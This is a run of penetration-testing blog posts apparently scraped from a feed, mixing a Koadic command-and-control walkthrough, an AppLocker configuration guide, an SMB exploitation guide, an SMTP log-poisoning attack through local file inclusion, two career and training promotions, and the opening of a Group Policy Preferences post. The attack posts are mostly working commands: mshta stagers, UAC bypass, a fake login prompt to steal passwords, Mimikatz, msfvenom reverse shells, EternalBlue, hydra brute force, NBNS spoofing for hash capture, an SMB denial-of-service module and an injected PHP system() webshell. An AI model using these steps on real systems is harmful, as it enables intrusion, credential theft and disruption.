To load all available module in the terminal run “use <tab> <tab>” command. This will dump all available implant and stagers for execution or explore stager module with following commands:

use stager/js/

This will give you all stagers that will be useful for getting zombie session of target machine.

Koadic Stagers

The stager enables us to describe where any zombie device accesses the Koadic command and control. Some of these settings can be viewed by running info command once the module is selected. Let’s start with loading the mshta stager by running the following command.

Set SRVHOST where the stager should call home and SRVPORT the port to listen for stagers on or even you can set ENDPOINT for malicious file name and then enter run to execute.

set SRVHOST 192.168.1.107
set ENDPOINT sales
run

Now wit for the victim to run below command to execute above generated malicious file.

mshta http://192.168.1.107:9999/sales

Once the malicious sales file will get executed on target machine, you will have a Zombie connection just like metasploit.

zombies 0

Privilege Escalation with Koadic Implants

Once you have zombie session after than you can use implant modules for privilege escalation that includes bypassuac.

Koadic contains all modules to bypassuac of Windows 7, 8, 10 platform, so that you can extract system level information. We can load this module by running the command below within Koadic.

use implant/elevate/bypassuac_eventvwr

Then, we will set the payload value to run the module. You can use default zombie value as “ALL” to attack all zombies or can set the particular zombie id you want to attack. Use the command below to adjust the payload value and zombie.

set PAYLOAD 0
set ZOMBIE 0
run

Post Exploitation

Generate Fake Login Prompt

You can start a phishing attack with koadic and track the victim’s login credentials. We can load this module by running the command below within Koadic.

use implant/phish/password_box
set ZOMBIE 1
run

This will launch a Prompt screen for login at victim’s machine.

Therefore, if the victim enters his password in a fake prompt, you get the password in the command and control of Koadic.

Enable Rdesktop

Just like metasploit, here also you can enable remote desktop service in the victim’s machine with the following implant module.

use implant/mange/enable_rdesktop
set ZOMBIE 1
run

As you can observe in the below image that job 4 is completed successfully and it has enabled rdesktop service.

We can ensure for rdesktop service with the help of nmap to identify state of port 3389.

nmap -p3389 192.168.1.103

Hmm!! So you can observe from nmap result we found port 3389 is open which means rdesktop service is enable.

Inject Mimikatz

It will let you inject mimkatz in victim’s machine for extracting password from inside the machine. We can load this module by running the command below within Koadic.

use implant/inject/mimikatz_dotnet2js
set ZOMBIE 1
run

As result, it will dump the NTLM hash password which we need to crack. Save the NTLM value in a text file.

Then we will use john the ripper for cracking hash value, therefore run following command along with the hash file as shown below:

john hash --format=NT

As you can observe that it has shown 123 as the password extracted from the hash file.

Execute Command

Since we high privileged shell therefore we are free to run any implant module for Post exploitation therefore now we are using exec_cmd to execute any command on the Windows system. To load this implant, run the command given below.

use implant/manage/exec-cmd

Then, we will set the CMD value to run the specify command along with Zombie id.

set CMD ipconfig
set ZOMBIE 1
run

Obtain Meterprter Session from Zombie Session

If you are having zombie session then you can get meterpreter session through it. Generate a malicious file with the help of msfvenom and start multi handle, as we always do in metasploit.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

Koadic provides an implant module that allows you to upload any file to the machine of the victim if you have zombie sessions. To load this implant, run the following command:

use implant/util/upload_file

Now set the file location and Zombie Id then run the module. This will upload your malicious in writable directory i.e. %TEMP% .

set LFILE /root/shell.exe
set ZOMBIE 1
run

 

Once the job is completed then again use exec_cmd to run the uploaded file with the help of this module.

use implant/manage/exec-cmd

Then, we will set the CMD value to run the uploaded shell.exe file along with Zombie id.

set CMD %TEMP%shell.exe
set ZOMBIE 1
run

Once you will execute the malicious exe file within Koadic zombie session, you will get a meterpreter session in the metasploit framework as shown below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set rhost IP 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit

Once the file is executed on the machine we will get the victim machine meterpreter session as show below:

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Koadic – COM Command & Control Framework appeared first on Hacking Articles.

Windows Applocker Policy – A Beginner’s Guide

Hello Friends!! This article is based on “Microsoft Windows – Applocker Policy” and this topic for System Administrator, defines the AppLocker rules for your application control policies and how to work with them.

Table of Content

Introduction to Applocker

  • What is applocker Policy?
  • Who Should Use AppLocker?
  • What can your rules be based upon?

Configure the Applocker to Allow/Deny Execution of an App

  • Configure Enforcement rule
  • Create Default Rules

Modify Executable Default Rules to Allow an App

  • Rule conditions
    • Publisher
    • Path
    • File Hash

Modify Windows Installer Default Rules to Allow an App

Modify Script Default Rules to Allow an App

Creating New Rules to Block an APP

Introduction to Applocker

What is applocker Policy?

Windows applocker is a function that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. Windows AppLocker lets administrators to control which executable files are denied or allowed to be run. With this policy, administrators are able to generate rules based on file names, publishers or file location on unique identities of files and to specify which users or groups can execute those applications.

What can your rules be based upon?

The AppLocker console is ordered into rule collections, those are executable files, scripts, Windows Installer files, packaged apps and packaged app installers, and DLL files. These collections allow you to easily distinguish the rules for different application types. The following table lists the file formats that are included in each rule collection.

Who Should Use AppLocker?

AppLocker is a worthy for organizations which have to accomplish any of the following jobs:

  • Check which applications are allowed to run inside the company.
  • check which users are allowed to run licensed program.
  • offer an audit log of what program customers were running.
  • prevent trendy users from installing software per user.

Configure the Applocker to Allow/Deny Execution of an App

In the Group Policy Object Editor at Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker, the Windows AppLocker settings exist.

Configure Enforcement Rule

Use the enforcement setting for each collection to configure to Enforce rules, rules are enforced for the rule collection and all events are audited.

  1. Select the Configured check box for the rule collection that you are editing, and then verify that Enforce rules is selected.
  2. Click OK.

Open Advance tab and enable the DLL rule collection.

Create Default Rules

AppLocker includes default rules for each rule collection. These rules are intended to help ensure that the files that are required for Windows to operate properly are allowed in an AppLocker rule collection.

  • Open the AppLocker console.
  • Right- click the appropriate rule type for which you want to generate default rules automatically. You can automatically create executable rules, Windows Installer rules, script rules, and packaged application rules.
  • Click Create Default Rules.

Executable Default Rule Types Include:

  • Allow members of the local Administrators group to run all apps.
  • Allow members of the Everyone group to run apps that are located in the Windows folder.
  • Allow members of the Everyone group to run apps that are located in the Program Files folder.

Modify Executable Default Rules to Allow an App

A rule can be configured to use allow or deny actions:

  • ALLOW : You can specify which files are allowed to run in your environment, and for which users or groups of users.
  • DENY : You can specify which files are not allowed to run in your environment, and for which users or groups of users.

Once you have configured default rules as done above, then you can modify it as per your requirement. For example if you want to modify rule :“Allow members of the Everyone group to run apps that are located in the Program Files folder” for specific user or group to allow a specific program file execution, then go its property by making right click on that rule and follow below steps.

Select the file or folder path that this rule should affect. The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles% \* indicates that all files and subfolders within that path.

Rule conditions

Conditions of rules are criteria for AppLocker to identify the applications to which the rule applies. The three main rules are publisher, path and hash of the file.

Publisher

Identifies a digital signature- based application. The digital signature encloses information about the company (the publisher) who created the application.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Advantage:

Frequent updating is not required.

You can apply different values within a certificate.

You can use a single rule to allow a complete product suite.

Within the publisher rule, you can use the asterisk (*) wildcard character to specify that any value should match.

Disadvantage:

While a single rule can be used to allow a complete product suite, all files in the suite must be uniformly signed.

Path

Identify an app in the computer file system or on the network by its location. For well-known paths such as Program Files and Windows, AppLocker uses custom path variables.

Advantages:

Many folders or a single file can be easily controlled.

The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles%\Microsoft Office\* indicates that all files and subfolders within the Microsoft Office folder will be affected by the rule.

Disadvantage:

It could be at risk if a rule that is organized to use a folder path holds subfolders that are writable by local user.

File Hash

Represents the calculated cryptographic hash system of the identified file. For non-digitally signed files, file hash rules are safer than path rules.

Advantage:

Since each file has a unique hash, a file hash condition only applies to one file.

Disadvantage:

Whenever the file is updated (such as security updates or upgrades), the hash of the file changes. Consequently, you have to manually update the rules for file hash.

Modify Windows Installer Default Rules to Allow an App

Windows Installer Default Rule Types Include:

  • Allow members of the local Administrators group to run all Windows Installer files.
  • Allow members of the Everyone group to run all digitally signed Windows Installer files.
  • Allow members of the Everyone group to run all Windows Installer files that are located in the Windows\Installer folder.

Similarly if you want to modify Windows Install default rules, then repeat above steps.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Publisher: The asterisk (*) character used by itself represents any publisher.

Product name: The asterisk (*) character used by itself represents any product name.

File name: Either the asterisk (*) or question mark (?) characters used by themselves represent any and all file names.

File version: The asterisk (*) character used by itself represents any file version. If you want to limit the file version to a specific version or as a starting point, you can state the file version and then use the following options to apply limits:

  • Exactly. The rule applies only to this version of the app
  • And above. The rule applies to this version and all later versions.
  • And Below. The rule applies to this version and all earlier versions.

Open Exceptions and then again select Publisher.

Modify Script Default Rules to Allow an App

Script Default Rule Types Include:

  • Allow members of the local Administrators group to run all scripts.
  • Allow members of the Everyone group to run scripts that are located in the Program Files folder.
  • Allow members of the Everyone group to run scripts that are located in the Windows folder.

Similarly if you want to modify Script default rules, then repeat above steps.

Select the file or folder path that this rule should affect.

Open Exceptions and then again select Publisher.

 

In this way, you can implement Default rules and modify them for Executable file, Script rules or Windows Installer files according to your situation.

Creating New Rules to Block an APP

If you want to make your own rule in order to allow or deny action for any application, you can choose the options ” Create New Rule” below. Let’s say, I want to create a new Executable file rule to restrict command prompt execution for everyone.

Then, you will get a wizard that helps you to create an Applocker rule, which will truly based on file attribute such as the file path and digital signature.

NOTE: Install the applications you want to create the rules for on this computer.

Now the action to use  and the user or group that this rule should apply to. A deny action prevent affected file from running.

Select the type of primary condition that you  would like to create. Here we have chose “Publisher” options.

Browse for a signed file to use as a reference for the rule. Here we have browse the cmd.exe and then click on next.

Choose the Publisher as exception and then click Next.

And finally, this will add your rule to restrict the cmd.exe.

Set Application identity to Automatic mode:

Then navigate to “Application identity Property” through Computer Configuration > Policies > Windows Settings > Security Settings > System Services > Application identity.

Then enable “Automatic” option as the service startup mode.

Now update the Group policy with the help of gpupdate command.

Now when you will try to open command prompt “cmd.exe” then you will get services restriction prompt as shown.

Note: If you are configuring these rule on single machine then it will take some time to impose the rule over machine.

Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/working-with-applocker-rules

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Windows Applocker Policy – A Beginner’s Guide appeared first on Hacking Articles.

SMB Penetration Testing (Port 445)

In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those, because different circumstances call for different measure.

Table of Content

Introduction to SMB Protocol

  • Working of SMB
  • Versions of Windows SMB
  • SMB Protocol Security

SMB Enumeration

Scanning Vulnerability

Multiple Ways to Exploit SMB

  • Eternal Blue
  • SMB login via Brute Force
  • PSexec to connect SMB
  • Rundll32 One-liner to Exploit SMB
  • SMB Exploit via NTLM Capture

SMB DOS-Attack

Post Exploitation

File Sharing

  • smbserver
  • smbclient

Introduction to SMB Protocol

Server Message Block (SMB), the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request

Working of SMB

SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.

Versions of Windows SMB

CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.

SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: This version used in Windows Server 2016 and Windows 10.

Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

SMB Protocol Security 

The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.

SMB Enumeration

To identify following information of Windows or Samba system, every pentester go for SMB enumeration during network penertation testing.

  • Banner Grabbing
  • RID cycling
  • User listing
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval

Here you can observe, we are using nmap the most famous network scanning tool for SMB enumeration.

nmap -p 445 -A 192.168.1.101

As a result, we enumerated following information of the target machine:

Operating System: Windows 7 ultimate

Computer Name & NetBIOS Name: Raj

SMB security mode: SMB 2.02

There are so many automated scripts and tools available for SMB enumeration and if you want to know more about SMB Enumeration then read this article “A Little Guide to SMB Enumeration”.

Scanning Vulnerability

During enumeration phase, generally we go for banner grabbing to identify version of running service and the host operating system. Once you enumerate this information then you should go for vulnerability scanning phase to identify whether the install service is vulnerable version or patched version.

Nmap serves various scripts to identify state of vulnerability for specific services, similarly it has inbuilt script for SMB to identify its vulnerable state for given target IP.

nmap --script smb-vuln* -p 445 192.168.1.101

As result, it shown the target machine is highly vulnerable to Ms17-010 (eternal blue) due to SMBv1.

To know more about Ms17-010 read complete article “3 ways to scan Eternal Blue Vulnerability in Remote PC

Multiple Ways to Exploit SMB

Eternal Blue

As we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit target machine.

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit

Boomm!! We have successfully access remote machine shell as shown in the bellow image.

SMB login via Brute Force

If you get fail to enumerate the vulnerable state of SMB or found patched version of SMB in the target machine, then we have “Brute force” as another option to gain unauthorized access of remote machine.

Here we only need two dictionaries that contains list of username and password in each and a brute forcer tool to make brute force attack.

hydra -L user.txt -P pass.txt 192.168.1.101 smb

-L –> denotes the path of username list

-P –>denote the path of password

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra cracks the credential, as you can observe that we had successfully grabbed the SMB username as raj and password as 123.

To know more about it, read complete article from here “5 Ways to Hack SMB Login Password

If you have SMB login credential, then you can use following module to determine what local users exist via the SAM RPC service.

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

PSexec – To Connect SMB

Once you have SMB login credential of target machine then with the help of following module of metasploit you can obtain meterpreter session to access remote shell.

use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

There so many script and tools are available to connect remote machine using SMB protocol, we have already written an article for connecting SMB in multiple ways. Read complete article from here “Multiple ways to Connect Remote PC using SMB Port”.

Rundll32 One-liner to Exploit SMB

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

This will generate a link for malicious dll file, now send this link to your target and wait for his action.

As soon as victim will run above malicious code inside the run prompt or command prompt, we will get meterpreter session at metasploit.

SMB Exploit via NTLM Capture                   

Another method to exploit SMB is NTLM hash capture by capturing response password hashes of SMB target machine.

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop
msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can observe that port 137 is open for NetBIOS network service in our local machine.

Now when victim will try to access our share folder therefore he will try of connect with us through his network IP, given below image is a proof to demonstrate that victim is connecting malicious IP: 192.168.1.109. When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured:

Username: raj

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _smb_netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

To know more about it read complete article from here “4 Ways to Capture NTLM Hashes in Network

SMB DOS-Attack

SMB Dos attack is another most excellent method we have in our metasploit framework.

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer or a Word document otherwise.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim will try to access share folder through our malicious IP, the target machine will get crushed and this attack is very effective.

Post Exploitation

This module will enumerate configured and recently used file shares.

use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

As you can observe that, here it has shown three UNC paths that have been entered in run dialog.

File Sharing  

Smbexec.py

Now we will use a python script that activates SMB service in our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit to github for this python script.

I copied the python code from github and past it into a text file as smbserver.py in desktop folder. Now execute give below command for a share folder “raj”.

Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it. In this way we can use smb python script for sharing file between windows and Linux machine.

Smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient –L 192.168.1.108

smbclient //192.168.1.108/raj

As you can observe with the help of smbclient we are able to view share folder of victim’s machine. Moreover we can use smbclient for sharing file in the network. Here you can observe we had login successfully using raj: 123 login and transfer the user.txt file.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post SMB Penetration Testing (Port 445) appeared first on Hacking Articles.

6 Ways To Learn New Infosec Skills

Staying up-to-date with the latest threats and techniques as well as how to counter them is a challenge for all security professionals. To help boost your efforts with what is a steep learning curve, here are 6 ways to advance your skills — and stimulate your career at the same time.

1. Read a good ol’ book

Because you can read them while you’re commuting to work or before you fall asleep, reading books is a great way to make the most of your valuable time. Or better yet, put down the video game controller, stop binge-watching the latest shows and get to work! Reading will allow you to learn the basics, methodologies, and techniques of whatever topics that you feel you need to push your career forward. Here are some books of varying levels that you can start to read this new year:

Helpful hint! Although there’s nothing like the feel of an actual, physical book, reading electronic copies of books has many advantages for the life-long learner. Highlighting text of a word, phrase or idea that is unfamiliar, allows you to make notes or search for more information before continuing. This is especially helpful when learning an entirely new skill and getting the foundational concepts solidified in your head. And, of course, it’s great on your back not having to lug huge volumes everywhere you go. It’s especially handy for reference materials that you won’t need every day.

2. Find a mentor

Seeking a mentor can be an extremely effective strategic career move.

There’s nothing better than learning by doing, but you will get stuck. And there’s only so much time to try harder when facing a real-world crisis, especially when no amount of trial-and-error or searching is getting you the solutions you need. That’s why having an expert to lean on is one of the best ways to quickly learn new skills. No one can be an expert in everything, so having multiple mentors is incredibly helpful.

But don’t be greedy with their time and always remember to help in return either directly or by paying it forward.

Not only can mentors help you acquire new technical skills, but they can also assist with soft skills such as identifying your strengths and weaknesses, how to better communicate and what pitfalls you might face when advancing your career. According to John White, here’s how to seek out a good mentor.

3. Attend security conferences

Security conferences are another great way to learn new skills, because you can not only attend keynote speeches to discover new topics but also participate in CTF challenges and training of all sorts. One great thing to do at conferences is networking with other professionals. That way, you’ll get an idea about what other career paths and jobs are like, and get a clearer view of what can work for you, too.

To know more about the wide range of security conferences 2019 has in store around the world, check out The Ethical Hacker Network’s Global Calendar of Security Events.

4. Network with other professionals

By networking with other professionals, you will discover new areas of security, techniques, skills or career paths available to take your own career to the next level. This is not just at conferences or online via LinkedIn but also at local meetups or online communities.

Another untapped resource could be the very company for which you already work. If it’s a large organization, there might just be email lists or slack channels of like-minded professionals that you would never meet otherwise.

Who knows? You might even meet your future employer or business partner. 😉

5. Make good use of free resources

In an industry as tactical as cybersecurity, practical skills are a MUST. Many online tools are available for you to test and practice your skills at no cost to you! Here are a few examples:

Another proven way to build your skillset and get more confidence for free is by hunting for vulnerabilities and bugs on dedicated platforms, such as Bugcrowd. You’ve got nothing to lose, everything to win. Interested? Here’s how to get started with bug bounties.

6. Enroll in practical training courses

Finally, the most complete way to learn new skills and acquire real-life security know-how is by enrolling in an online training course. Online training courses are such good options because they allow you to learn at your own pace, from the comfort of your own home. Here’s what to look for in an online training course:

  • Non-expiry or lifetime access to course materials
  • Mobile-Accessible materials for studying on the go
  • Up-to-date study materials (in terms of what is taught and techniques used)
  • Highly practical training, with numerous virtual labs, preferably based on real-life scenarios
  • Different formats of training materials (slides, videos, labs, etc.)
  • Availability of practical certification, to prove your skills

To help security professionals stay up-to-date with the latest cyber threats and techniques to defend against them, numerous books, security conferences, free online resources, and practical training courses are at your disposal. Whatever options best fit you, be sure to remember that consistent practice and determination will always be the best path to success. For this reason, it shouldn’t just be your resolution for 2019, but rather make it your personal mission this year and beyond to take advantage of these opportunities. Good luck!

Aspiring to advance your InfoSec career? Have a look at our various red team and blue team training courses, or combine them for the best that purple-teaming can do for your resume.
DISCOVER TRAINING COURSES

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

SMTP Log Poisioning through LFI to Remote Code Excecution

Hello friends!! Today we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up” and “Beginner Guide to File Inclusion Attack (LFI/RFI)” . Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file Inclusion.

Let’s Start!!

With the help of Nmap, we scan for port 25 and as result it shows port 25 is open for SMTP service.

nmap -p25 192.168.1.107

This attack is truly based on Local file Inclusion attack; therefore I took help of our previous article where I Created a PHP file which will allow the user to include a file through file parameter.

As a result, you can observe that we are able to access /etc/passwd file of victim machine.

Now if you are able to access the mail.log file due to LFI, it means the mail.log has read and write permission and hence we can infect the log file by injecting malicious code.

Now let’s try to enumerate further and connect to the SMTP (25) port

telnet 192.168.1.107 25

As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via “RCPT TO” option. Since the mail.log file generates log for every mail when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in mail.log file as new log.

MAIL FROM:<rrajchandel@gmail.com>
RCPT TO:<?php system($_GET['c']); ?>

Note : We can ignore the 501 5.1.3 Bad recipient address syntax server response as seen in the above screenshot because ideally the internal email program of the server (victim machine), is expecting us to input an email ID and not the OS commands.

As our goal is to inject php into the logs and this stage it is called log file poisoning and we can clearly see that details of mail.log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.

192.168.1.107/lfi/lfi.php?file=/var/log/mail.log &c=ifconfig

But you can observe its output in its source code as shown in the below image:

This is called SMTP log poisoning and through such type of vulnerability we can easily take reverse shell of victim’s machine.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvport  8888
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1 of targeted web server.

 

msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post SMTP Log Poisioning through LFI to Remote Code Excecution appeared first on Hacking Articles.

What Makes a Professional Penetration Tester?

Penetration testers, often called “ethical hackers,” are highly skilled professionals that test computer networks, systems, applications, etc. for vulnerabilities before malicious (or unethical) hackers do. Find out what it takes to be an invaluable pentester below.

The Role At A Glance

On a daily basis, penetration testers are in charge of protecting their organization’s networks, systems, and/or applications. To do that, they’ll perform “ethical hacks” or “penetration tests” of networks to identify potential vulnerabilities or report them to higher authorities with professional recommendations. Their responsibilities are continously expanding with the number of new threats each year.

There are 3 main career options for professional penetration testers, either in-house, as part of a consulting firm (or their own consulting business), or also as freelancers.

According to the Bureau of Labor Statistics (BLS), information security analysts, including penetration testers, make an annual median salary of $95,510. Additionally, their employment is expected to grow 28% by 2026, much faster than the average for all occupations.

Day-2-Day Responsibilities

On a daily basis, penetration testers are responsible for testing a company’s network, infrastructure, application, etc. for vulnerabilities, ensuring that all assets are secure. In greater details, pentesters will:

  • Conduct Tests on Networks and Applications: In an attempt to find potential vulnerabilities that companies may have on their systems, web, or mobile applications, penetration testers will test them for vulnerabilities.
  • Physical Security Assessments: Because vulnerabilities can be present on physical servers and networks, pentesters will test there too.
  • Conduct Security Audits: By conducting audits, penetration testers can establish the overall security risks of a company and recommend best practices to follow.
  • Analyze Security Policies: Companies often think they have strong security policies… until breached. Testing them with real-life scenarios will only confirm (or deny) such statements and policies.
  • Write Security Assessment Reports: Because no job is really done without a final report, penetration testers will regroup their findings and recommendations on a penetration test report destined to either their employer or client.’

Of course, responsibilities might vary depending on the seniority of professional pentesters, and the size and/or needs of the company they work for.

Necessary Skills

Professional penetration testers know that practical skills are crucial, but so are personal skills… Here are some of the most important skills to have to be a successful penetration tester:

TECHNICAL SKILLS:
  • System Security— The processes involved with keeping information confidential and assuring its integrity.
  • Network Security— The security testing methodology, techniques, and tools for networked PC and devices.
  • Web Applications— The testing methodology, techniques, and tools for web applications.
  • Mobile Applications— The testing methodology, techniques, and tools for mobile applications.
  • WiFi Security— All the attack techniques and tools used against Wi-Fi networks, and how to detect them.
  • Social Engineering— Deep knowledge of the most modern social engineering attacking techniques.
  • Advanced Reconnaissance & Enumeration— How to retrieve the most important pieces of information out of Active Directory, while remaining undetected.
  • Reverse Engineering— The techniques and tools to deconstruct software, malware, and all ranges of attacks.
PERSONAL SKILLS:
  • Organizational Skills— An important part of any penetration test is the reporting phase. To do that, pentesters need to stay organized through the pentest, note down all kinds of important information that they will be required to include in their final report. Clients often judge the work of pentesters by the quality of their report — hence the importance of being organized.
  • Writing Skills— While being organized is a great skill to have, pentesters should also have good writing skills. Most of the people that will read the pentest report will be executives from the C-Suite level or non-security related fields. For them to understand your report and recommendations to fix the found vulnerabilities, you need to be able to write in a normal way, so stay clear of the infosec jargon.

Penetration testing can be a rewarding career. Indeed, professionals in this field not only like their job for obvious financial reasons, but also find this job to be highly satisfying in terms of accomplishments.

Interested in starting out a career in penetration testing? Check out our Penetration Testing Professional (PTP) training course for yourself, get your free trial below.

Sources: Job Hero, Dark Reading

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Penetration Testing on Group Policy Preferences

Hello Friends!! You might be aware of Group Policy Preferences in Windows Server 2008 that allows system administrators to set up specific configurations. It can be used to create username and encrypted password on machines. But do you know, that a normal user can elevate privilege to local administrator and probably compromise the security of the entire domain because passwords in preference items are not secured.

Table of Content

  • What is Group Policy Preferences?
  • Why using GPP to create a user account is a bad Idea?
  • Lab Set-Up Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy preferences shortly term as GPP permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of Group Policy Preferences (GPP) is the ability to store and moreover these policies can make all kinds of configuration changes to machines, like as:

  • Map drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the safety consequences carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive share folder in the Active Directory accessed by all authenticated users.

